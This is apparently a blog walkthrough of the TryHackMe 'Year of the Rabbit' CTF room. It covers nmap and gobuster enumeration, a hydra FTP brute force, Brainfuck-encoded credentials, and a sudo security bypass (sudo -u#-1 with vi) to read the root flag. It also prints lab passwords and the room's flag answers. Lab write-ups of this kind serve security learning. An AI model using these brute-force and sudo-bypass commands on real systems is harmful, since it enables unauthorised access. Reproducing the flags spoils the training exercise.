In this walk through, we will be going through the Year of the Rabbit from Tryhackme. This room is rated as easy on the platform and it covers Enumeration, Password bruteforcing, Exploitation and Privilege Escalation. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Year of the Rabbit |
IPaddress | 10.10.122.215 |
Difficulty | Easy |
Objective | Let’s have a nice gentle start to the New Year! Can you hack into the Year of the Rabbit box without falling down a hole? |
Enumeration:
- Starting with a regular nmap scan. Found ports 21,22 and 80 Open running FTP, SSH and HTTP respectively.
sudo nmap -sS -sV 10.10.122.215
- Firing up gobuster on port 80, found directory /assets. Navigating to it reveal style.css which gives us a directory – sup3r_s3cr3t_fl4g.php
wh1terose@fsociety:~$ gobuster dir -u http://10.10.122.215/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.122.215/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/04/24 21:39:49 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /assets (Status: 301) [Size: 315] [--> http://10.10.122.215/assets/] /index.html (Status: 200) [Size: 7853] /server-status (Status: 403) [Size: 278] Progress: 3941 / 4656 (84.64%) =============================================================== 2023/04/24 21:41:41 Finished ===============================================================
- Navigating to the found directory, it executes an inline javascript file which redirects us to Youtube and Rick roll us.
- We disable that using firefox configuration settings. Go to about:config => Search for Javascript => Toggle it to false
- Next as per the hint, i listen up the video, which reveals that it was a rabbit hole. Next, in Developer tools, reload the network tab, it gives us a hidden directory.
- The hidden directory reveals a file named Hot_babe.png
- Finding some hidden strings inside the image file gives us a ftp username and potential wordlist which we can use later with hydra to bruteforce the password of user – ftpuser.
hydra -l ftpuser -P Wordlist ftp://10.10.122.215
wh1terose@fsociety:~/CTF/TryHackme/Year of the Rabbit$ ftp 10.10.122.215 Connected to 10.10.122.215. 220 (vsFTPd 3.0.2) Name (10.10.122.215:wh1terose): ftpuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt 226 Directory send OK. ftp> ascii 200 Switching to ASCII mode. ftp> get Eli's_Creds.txt local: Eli's_Creds.txt remote: Eli's_Creds.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes). WARNING! 11 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. 758 bytes received in 0.00 secs (5.0551 MB/s) ftp> exit 221 Goodbye.
- Got a file “Eli’s_Creds.txt”. This contains some encrypted type. Cyberchef was of no use. Actually it is a programming language called brainfuck. So, decoded it using an online decoder and finds Eli’s password.
wh1terose@fsociety:~/CTF/TryHackme/Year of the Rabbit$ cat "Eli's_Creds.txt" +++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->- --<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+ ++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+ +++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++< ]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+ ++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->--- --<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++ +<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+ ++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++ <]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
- Brainfuck Decoder – https://www.dcode.fr/brainfuck-language
Username: Eli
Password: DSpDiM1wAEwid
Initial Access:
- Got our first shell using Eli’s creds with SSH.
- As per the message, i find out the hidden secret place using find command. Found in /usr/games/s3cr3ts. It gives us gwendoline password.
eli@year-of-the-rabbit:/$ find / -name s3cr3t 2> /dev/null /usr/games/s3cr3t eli@year-of-the-rabbit:/$ eli@year-of-the-rabbit:/$ cd /usr/games/s3cr3t/ eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls -al total 12 drwxr-xr-x 2 root root 4096 Jan 23 2020 . drwxr-xr-x 3 root root 4096 Jan 23 2020 .. -rw-r--r-- 1 root root 138 Jan 23 2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly! eli@year-of-the-rabbit:/usr/games/s3cr3t$ cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! Your password is awful, Gwendoline. It should be at least 60 characters long! Not just MniVCQVhQHUNI Honestly! Yours sincerely -Root
Username: gwendoline
Password: MniVCQVhQHUNI
- We got our user flag!
Privilege Escalation:
- For Priv esc, this was also a rabbit hole. By sudo we can see that the sudo is configured to not to run. It can be bypassed using – sudo 1.8.27 – Security Bypass (https://www.exploit-db.com/exploits/47502)
gwendoline@year-of-the-rabbit:~$ sudo -l Matching Defaults entries for gwendoline on year-of-the-rabbit: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User gwendoline may run the following commands on year-of-the-rabbit: (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt gwendoline@year-of-the-rabbit:~$
- Use the below command and when the vi terminal opens up. Type :! then. “cat /root/root.txt”. Press Enter. You will get your root flag.
gwendoline@year-of-the-rabbit:~$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161} Press ENTER or type command to continue
Task 1 – Flags
Question 1 – What is the user flag?
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
Question 2 – What is the root flag?
THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}
Also Read: Tryhackme – Wireshark: The Basics
Conclusion:
So that was “Year of the Rabbit” for you. We started off with a regular nmap scan and found three ports opened – 80 (HTTP) and 22 (SSH) and 21(FTP). Next, performed directory bruteforcing with gobuster and found directory pattern of /assets which leads to a secret page named sup3r_s3cret_fl4g.php. After getting rickrolled by the page, used the network tab to reveal a hidden directory called WExYY2Cv-qU which has a file named called Hot_Babe.png. Next, i used strings command to get a potential password wordlist hidden in the image file. With the deduced wordlist, used hydra to bruteforce the FTP password of user ftpuser. Moving on, we got Elli’s creds from the FTP server encoded in Brainfuck language. We then decoded it and used it to get our initial access via SSH. At last, we moved to the Privilege escalation part where we used the vi binary to read the contents of the root.txt file and the messages between Israel and Palestine prime ministers. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.